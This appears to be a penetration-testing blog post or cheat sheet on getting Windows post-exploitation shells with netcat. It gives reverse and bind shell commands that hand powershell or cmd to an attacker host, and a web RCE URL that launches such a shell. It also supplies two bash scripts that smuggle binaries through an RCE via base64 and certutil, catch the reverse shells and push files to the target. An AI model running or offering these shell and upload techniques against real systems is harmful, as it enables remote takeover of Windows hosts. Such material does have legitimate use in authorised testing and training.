Windows Post Exploitation Shells and File Transfer with Netcat for Windows

The Problem

We know the situation all too well: we have remote code execution and can upload or write files over a temperamental connection, but we want something a little more robust, something like netcat, which comes in so handy when pwning Unix systems.

The Solution — Netcat for Windows

Both builds are published in the int0x33/nc.exe repository on GitHub (github.com/int0x33/nc.exe): nc.exe is the 32-bit binary and nc64.exe the 64-bit one. Both binaries are well known to anti-virus engines, so expect Defender or a similar product to quarantine them on a monitored host.

Uploading Files

A tip that often comes in handy is to base64-encode the file, write the base64 blob to the target through the vuln or RCE, and decode it there (on Windows, certutil -decode does the job, as does [Convert]::FromBase64String in PowerShell); whether you decode before or after depends on your RCE situation. Copying a binary as-is often fails: bytes that the transport or the vulnerable application treats specially (shell operators, quotes, null bytes, non-ASCII) will break the connection or the application, or worse, crash the target host.
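To make the upload trick concrete, here is an added helper script (my example, not code from the post or from the int0x33 repository) that runs on the attacker's Unix machine. It base64-encodes the binary, splits the blob into chunks short enough to survive a fragile channel, and emits the cmd.exe one-liners that rebuild and decode it on the target. It assumes the RCE reaches cmd.exe and that certutil.exe is present, which it is on every supported Windows release; the file names, the chunk width and the 7-byte sample file are constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example (not part of the original post): prepare a binary for the
# base64 upload trick. Runs on the attacker's Unix box and emits the cmd.exe
# lines to feed through the RCE, each short enough to survive a fragile
# channel and free of null bytes, quotes and shell operators.
set -eu

# base64 of a file as one unbroken line (portable across GNU and BSD base64)
b64_encode_file() {
  base64 "$1" | tr -d '\n'
}

# Emit the target-side cmd.exe commands: rebuild the blob chunk by chunk, then
# decode it with certutil, which ships with Windows. The redirection is placed
# before echo on purpose: "echo ...1> file" would be parsed by cmd as a
# handle-1 redirect when a chunk happens to end in a digit, corrupting the file.
gen_target_commands() {  # $1 = local file, $2 = name on target, $3 = chunk width
  local b64name="$2.b64"
  b64_encode_file "$1" | fold -w "$3" | awk -v f="$b64name" '
    NR == 1 { printf(">%s echo %s\n", f, $0); next }  # first chunk creates the file
            { printf(">>%s echo %s\n", f, $0) }       # later chunks append
  '
  printf 'certutil -decode %s %s\n' "$b64name" "$2"
}

# Percent-encode a command for use in a URL parameter, as in the web RCE
# example above; everything but RFC 3986 unreserved characters is escaped.
urlencode() {
  local s="$1" c out=''
  while [ -n "$s" ]; do
    c=${s%"${s#?}"}      # first character of $s
    s=${s#?}             # drop it
    case $c in
      [A-Za-z0-9.~_-]) out="$out$c" ;;
      *)               out="$out$(printf '%%%02X' "'$c")" ;;
    esac
  done
  printf '%s\n' "$out"
}

# Demo on a constructed 7-byte stand-in for nc64.exe (an MZ header prefix),
# chunked at 4 characters so the output stays readable. Real use: a larger
# width (a few hundred characters) against the real nc64.exe.
sample="${TMPDIR:-/tmp}/sample.bin"
printf 'MZ\220\000\003\000\000\000' > "$sample"
gen_target_commands "$sample" nc64.exe 4
urlencode 'nc64.exe 10.10.10.10 1337 -e powershell'
```

Each emitted line is pure ASCII from the base64 alphabet, so it can be pasted into a cmd-level RCE as-is; if the channel is a URL parameter like the one above, run every line through urlencode first, since + and / are reserved in URLs. Once certutil has written the binary, the shells and transfers in the following sections apply unchanged.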

Reverse Powershell

#32bit
nc.exe $ATTACKER_HOST $ATTACKER_PORT -e powershell
#64bit
nc64.exe $ATTACKER_HOST $ATTACKER_PORT -e powershell

Example RCE on a web app, assuming nc64.exe has already been dropped into the working directory of the vulnerable process and that the pageId value ends up on a command line:

https://vulnerable.com?pageId=nc64.exe 10.10.10.10 1337 -e powershell

In practice the parameter would be URL-encoded:

https://vulnerable.com?pageId=nc64.exe%2010.10.10.10%201337%20-e%20powershell

Bind Powershell

A bind shell only helps if the target's host firewall and any network ACLs in the path allow inbound connections to $LISTENPORT; if they do not, use the reverse variants instead.

#32bit
nc.exe -l -p $LISTENPORT -e powershell
#64bit
nc64.exe -l -p $LISTENPORT -e powershell

Reverse Shell

#32bit
nc.exe $ATTACKER_HOST $ATTACKER_PORT -e cmd
#64bit
nc64.exe $ATTACKER_HOST $ATTACKER_PORT -e cmd

Bind Shell

#32bit
nc.exe -l -p $LISTENPORT -e cmd
#64bit
nc64.exe -l -p $LISTENPORT -e cmd

Transfer File

netcat reports neither completion nor integrity, so check the hash of the received file afterwards (certutil -hashfile $FILE SHA256 on the Windows side). Also note that the Unix sender keeps the connection open after it hits EOF on the file unless told otherwise (-q 1 on GNU/Debian netcat, -N on OpenBSD netcat), and the nc.exe receiver only exits when that connection closes; either pass the flag or interrupt the sender once the transfer is done.

Sender (Unix)

nc $TARGET $PORT < $FILE

Receiver (Windows)

#32bit
nc.exe -l -p $LISTENPORT > $FILE
#64bit
nc64.exe -l -p $LISTENPORT > $FILE
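The post only shows the Windows side of the shells and the bare send command for the transfer. Below is an added attacker-side script (my example, not from the post or the int0x33 repository) that supplies the missing half for both: the listener that catches the reverse shells from the sections above, and a sender for the file transfer that records a SHA-256 before pushing and prints the certutil command to verify the copy on the target. It assumes a Linux or macOS attacker box with either GNU/Debian or OpenBSD netcat installed as nc; the host, port and file names are placeholders.

```bash
#!/usr/bin/env bash
# Added example, not from the original post: attacker-side helpers for the
# reverse shells and the netcat file transfer above.
set -eu

# Listener for the reverse shells: start this before triggering the RCE or the
# connect-back fails immediately. -n skips DNS, -v reports the connection.
catch_reverse_shell() {  # $1 = $ATTACKER_PORT
  nc -lvnp "$1"
}

# Portable SHA-256 of a file (GNU coreutils or BSD/macOS)
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# Command for the Windows side to verify the received copy; certutil prints
# the hash on its own line for the operator to compare against ours.
windows_verify_cmd() {  # $1 = file name on the target
  printf 'certutil -hashfile %s SHA256\n' "$1"
}

# Flag that makes the local nc close the socket after EOF on stdin, so the
# nc.exe receiver exits on its own: -q on GNU/Debian netcat, -N on OpenBSD.
nc_close_flag() {
  if nc -h 2>&1 | grep -q -- '-q'; then printf '%s' '-q 1'; else printf '%s' '-N'; fi
}

# Push a file to a listening "nc.exe -l -p PORT > FILE" and print what the
# operator needs to confirm the transfer on the target.
send_file() {  # $1 = local file, $2 = target host, $3 = target port
  local hash; hash=$(sha256_of "$1")
  printf 'sending %s (sha256 %s) to %s:%s\n' "$1" "$hash" "$2" "$3"
  # shellcheck disable=SC2046  # the flag is intentionally split into words
  nc $(nc_close_flag) "$2" "$3" < "$1"
  printf 'on the target, run: '
  windows_verify_cmd "$(basename "$1")"
  printf 'expected: %s\n' "$hash"
}

# Usage (placeholders): send_file ./nc64.exe 10.10.10.20 4444
#                       catch_reverse_shell 1337
```

The verification step matters more than it looks: a transfer cut off by a flaky link leaves a truncated nc64.exe that fails to start, and nothing in the netcat exchange will tell you so. If the hashes disagree, re-send rather than debugging the shell.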